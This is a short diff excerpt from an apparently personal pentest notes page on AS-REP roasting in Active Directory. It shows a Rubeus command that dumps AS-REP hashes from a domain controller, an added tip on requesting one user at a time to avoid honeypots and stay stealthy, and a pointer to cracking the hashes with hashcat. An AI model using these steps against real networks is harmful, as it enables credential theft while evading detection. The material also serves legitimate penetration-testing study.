stellastrareviews/ky4meru.github.io/docs/active-directory/asreproasting.md

 # From a Windows computer not joined to the domain.
 .\Rubeus.exe asreproast /creduser:$domain\$username /credpassword:$password /domain:$domain /dc:$dc_ip /outfile:hashes.asreproast /nowrap
 ```

+{: .warning }
+> If you want to be more stealthy and avoid honey pots, request one user at the time.
+For instance, with `Rubeus`, add `/user:$target` option.

 Then, crack the AS-REP hash.
 You can use [hashcat](https://github.com/hashcat/hashcat) to do that.